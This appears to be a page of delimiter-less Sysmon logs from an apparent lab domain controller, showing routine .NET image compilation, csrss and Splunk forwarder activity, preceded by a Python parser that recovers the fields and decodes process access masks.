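The export above has lost every field delimiter: each Sysmon record is the <System> header (EventID, Version, Level, Task, Opcode, Keywords, EventRecordID, Channel, Computer) run straight into the EventData fields, so a ProcessAccess record reads `...CF01}844876C:\Windows\system32\svchost.exe...` where `844` is the SourceProcessId and `876` the SourceThreadId. The parser below is an added example written for this page, not part of the exported data or of Sysmon or Splunk tooling. It assumes the documented Sysmon field order for EventID 1, 10 and 23, that RuleName is the `-` placeholder and that Hashes are ordered MD5,SHA256,IMPHASH (true of every record on this page). The fused SourceProcessId+SourceThreadId has no structural boundary, so it is split only when exactly one PID already seen for the same image (from ProcessCreate, FileDelete or the TargetProcessId side of ProcessAccess) prefixes the digits; otherwise both stay `None` and the raw digits are kept. The sample input is four records copied from this page with the two call traces shortened.

```python
"""Recover fields from a delimiter-less Sysmon export such as the records above.

Added example, not part of the exported data. Field order follows the Sysmon schemas for
EventID 1 (ProcessCreate), 10 (ProcessAccess) and 23 (FileDelete). Assumed from this page:
RuleName is the "-" placeholder and Hashes are ordered MD5,SHA256,IMPHASH. Boundaries no
schema can restore (Description/Product/Company in EventID 1) stay in one "unparsed" blob.
"""
import re

def _guid(name):
    return r"\{(?P<%s>[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})\}" % name

_PATH = r"[A-Za-z]:\\.+?\.exe"  # image path: shortest match that ends in .exe
_HASHES = (r"MD5=(?P<md5>[0-9A-Fa-f]{32}),SHA256=(?P<sha256>[0-9A-Fa-f]{64}),"
           r"IMPHASH=(?P<imphash>[0-9A-Fa-f]{32})")

# <System> part: EventID, Version, Level, Task (== EventID for Sysmon), Opcode, Keywords,
# EventRecordID, Channel, Computer; EventData then opens with RuleName "-" and UtcTime.
# The backreference to event_id is what fixes where the fused leading digits split.
HEADER = re.compile(
    r"^(?P<event_id>\d+)(?P<version>\d)(?P<level>\d)(?P=event_id)(?P<opcode>\d)"
    r"(?P<keywords>0x[0-9A-Fa-f]{16})(?P<record_id>\d+)"
    r"Microsoft-Windows-Sysmon/Operational(?P<computer>.+?)-"
    r"(?P<utc_time>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d{3})(?P<body>.*)$")

FILE_DELETE = re.compile(
    _guid("process_guid") + r"(?P<pid>\d+)(?P<user>.+?)(?P<image>" + _PATH + r")"
    r"(?P<target_filename>[A-Za-z]:\\.+?)" + _HASHES +
    r"(?P<is_executable>true|false)(?P<archived>true|false)$")

# SourceProcessId and SourceThreadId are fused; split_pid_tid() resolves them afterwards.
# GrantedAccess is matched lazily because the hex mask runs straight into the "C:\" frames.
PROCESS_ACCESS = re.compile(
    _guid("source_guid") + r"(?P<source_pid_tid>\d+)(?P<source_image>" + _PATH + r")" +
    _guid("target_guid") + r"(?P<target_pid>\d+)(?P<target_image>" + _PATH + r")"
    r"(?P<granted_access>0x[0-9A-Fa-f]+?)(?P<call_trace>[A-Za-z]:\\.*)$")

PROCESS_CREATE = re.compile(
    _guid("process_guid") + r"(?P<pid>\d+)(?P<image>" + _PATH + r")(?P<unparsed>.*?)" +
    _HASHES + _guid("parent_guid") + r"(?P<parent_pid>\d+)(?P<parent_image>" + _PATH +
    r")(?P<parent_command_line>.*)$")

BODY = {1: PROCESS_CREATE, 10: PROCESS_ACCESS, 23: FILE_DELETE}

# Process-specific access rights (winnt.h), one name per bit 0..13; 0x1fffff is ALL_ACCESS.
_RIGHTS = ("TERMINATE CREATE_THREAD SET_SESSIONID VM_OPERATION VM_READ VM_WRITE DUP_HANDLE "
           "CREATE_PROCESS SET_QUOTA SET_INFORMATION QUERY_INFORMATION SUSPEND_RESUME "
           "QUERY_LIMITED_INFORMATION SET_LIMITED_INFORMATION").split()

def decode_access(mask):
    value = int(mask, 16)
    if value == 0x1FFFFF:
        return ["PROCESS_ALL_ACCESS"]
    return [name for i, name in enumerate(_RIGHTS) if value >> i & 1]

def parse_record(line):
    m = HEADER.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    body = rec.pop("body")
    rec["event_id"] = int(m.group("event_id"))
    rec["rule_name"] = "-"
    pattern = BODY.get(rec["event_id"])
    bm = pattern.match(body) if pattern else None
    if bm:
        rec.update(bm.groupdict())
    else:
        rec["unparsed"] = body  # unknown EventID, or a schema these regexes do not cover
    return rec

def known_pids(records):
    """image path -> PIDs, collected only from fields where the PID stands alone."""
    table = {}
    for r in records:
        for img, pid in (("image", "pid"), ("parent_image", "parent_pid"),
                         ("target_image", "target_pid")):
            if img in r:
                table.setdefault(r[img].lower(), set()).add(int(r[pid]))
    return table

def split_pid_tid(digits, image, table):
    """Split fused SourceProcessId+SourceThreadId; (None, None) unless exactly one PID fits."""
    hits = [p for p in table.get(image.lower(), ())
            if digits.startswith(str(p)) and len(digits) > len(str(p))]
    if len(hits) != 1:
        return None, None
    return hits[0], int(digits[len(str(hits[0])):])

def parse_export(text):
    records = [r for r in map(parse_record, text.splitlines()) if r]
    table = known_pids(records)
    for r in records:
        if r["event_id"] == 10:
            r["source_pid"], r["source_tid"] = split_pid_tid(
                r["source_pid_tid"], r["source_image"], table)
    return records

# Constructed sample: four records copied from the export on this page (EventRecordIDs 22497,
# 22498, 22499, 22425), each rejoined onto one line; the two call traces are shortened.
SAMPLE = "\n".join([
    r'154100x800000000000000022497Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.984{4DB9351A-A26C-60D3-2105-00000000CF01}5784C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service',
    r'10341000x800000000000000022498Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.983{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A26C-60D3-2105-00000000CF01}5784C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNEL32.DLL+1c213',
    r'10341000x800000000000000022499Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.983{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A26C-60D3-2105-00000000CF01}5784C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f',
    r'23542300x800000000000000022425Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.483{4DB9351A-A26B-60D3-1205-00000000CF01}3332NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0VUECGYFUE\System.ServiceProcess.ni.dll.auxMD5=D4AE2E57B736A6E69B3AD3331661A700,SHA256=D7076448A737664A250EA9ADCF9866EDCB84C427426EA5B5F10152D9D412CEE6,IMPHASH=00000000000000000000000000000000falsetrue',
])

if __name__ == "__main__":
    for r in parse_export(SAMPLE):
        print(r["record_id"], r["event_id"], r.get("source_pid"), r.get("source_tid"))
```

On the sample, record 22498 resolves to SourceProcessId 2404 / SourceThreadId 3520 because 2404 is the ParentProcessId of splunkd.exe in record 22497, while 22499 from csrss.exe stays unresolved: nothing in the four records fixes the csrss PID, and guessing it would be worse than reporting the ambiguity. The GrantedAccess decoder is the piece a detection engineer actually wants from EventID 10: the 0x1fffff handles here come from csrss.exe, ngen.exe and a parent splunkd.exe, which is the normal parent/subsystem pattern, and any allowlist built from this export should key on the source image path, not on the mask alone.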
10341000x800000000000000022486Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.780{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A26C-60D3-1E05-00000000CF01}6320C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022485Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.780{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26C-60D3-1E05-00000000CF01}6320C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022484Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.765{4DB9351A-A26C-60D3-1D05-00000000CF01}7008NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BBMYPFWXBL\System.Xml.Linq.ni.dll.auxMD5=4A148C61F07E22CD3E4BF30752ED869C,SHA256=E235A9BCF4497D16500E1AA1AA2F161512955D9912BD9488828B0939EF68B42D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022483Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.765{4DB9351A-A26C-60D3-1D05-00000000CF01}7008NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BBMYPFWXBL\System.Xml.Linq.ni.dllMD5=2EA51644F79FD5C555C12EF33462D4C6,SHA256=2675E7B9B2D3E9F396FB55D1925853AD5E15A30E4FF23834901020CC90AED626,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000022482Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.749{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=511E115E3037EFFCDFF3E140F5E2A9EA,SHA256=CDC10B353FE1D2F1CC9A9D2017C4CBF76CE8FD0CEE3FB7FA7B1914A345548B25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022481Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.749{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7D0F2E059C646D4D5AD0DFE7FBC6B172,SHA256=94400AD645864338C327246ABAC8700E8CB9FFBB46D88FD10685BEBCADFCD5F1,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000022480Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.733{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26C-60D3-1D05-00000000CF01}7008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022479Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.702{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A26C-60D3-1D05-00000000CF01}7008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022478Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:52.702{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26C-60D3-1D05-00000000CF01}7008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022477Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.702{4DB9351A-A26C-60D3-1C05-00000000CF01}3568NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\LV2HKH4ALF\System.Net.Http.ni.dll.auxMD5=17D7D82FA4E5F7AC7B0F942186A6A559,SHA256=18512E0DB188F63EEF52FA2BEFFDF9B1CA2B40C3CA4DC473FFBA87DDC3F9E0A1,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000022476Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.702{4DB9351A-A26C-60D3-1C05-00000000CF01}3568NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\LV2HKH4ALF\System.Net.Http.ni.dllMD5=38C711EAF3F4DD244AF9B53A604DC9EA,SHA256=E3D5B75A615E7CAEED67FBE0F0BB371D210F8ED75B10F831AC4DE0B38762D1E0,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022475Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.625{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26C-60D3-1C05-00000000CF01}3568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022474Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.593{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A26C-60D3-1C05-00000000CF01}3568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022473Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:52.593{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26C-60D3-1C05-00000000CF01}3568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022472Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.577{4DB9351A-A26C-60D3-1B05-00000000CF01}5960NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\01KKPPDUZK\System.Xaml.ni.dll.auxMD5=D65DF9F3D32C2244FADF050D7ED38EB0,SHA256=F6B55DAE115F3B0A73B3C721F0EAEB62C1C62F126E02C16D304CAEA473935A8A,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000022471Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.577{4DB9351A-A26C-60D3-1B05-00000000CF01}5960NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\01KKPPDUZK\System.Xaml.ni.dllMD5=DD8D47026E122E60E51A0CB4F94023CF,SHA256=C3862AEBB30F0FE096B0873D6DDB1E7C13BC77E91E602B8239FAD50A9EEE2D6F,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022470Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.405{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26C-60D3-1B05-00000000CF01}5960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000022469Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.263{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61456-false10.0.1.12-8000- 10341000x800000000000000022468Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:52.374{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A26C-60D3-1B05-00000000CF01}5960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022467Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.374{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26C-60D3-1B05-00000000CF01}5960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 
23542300x800000000000000022466Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.374{4DB9351A-A26C-60D3-1A05-00000000CF01}6352NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\7V4IFP7MM9\System.Configuration.Install.ni.dll.auxMD5=A2282F6A18007D965E2FC8F3CE70F356,SHA256=F3CDBDE20C230B5D848E35B0C839BBE52E17F6DF23D735FF51674D2871D1EB25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022465Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.374{4DB9351A-A26C-60D3-1A05-00000000CF01}6352NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\7V4IFP7MM9\System.Configuration.Install.ni.dllMD5=47E73BD97BC224F2B43A80D0DE2CD420,SHA256=513E1D7CBD1A945A57A4F734A22D9DCCE61B1B81754C590CF0E48DBC7109D133,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022464Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 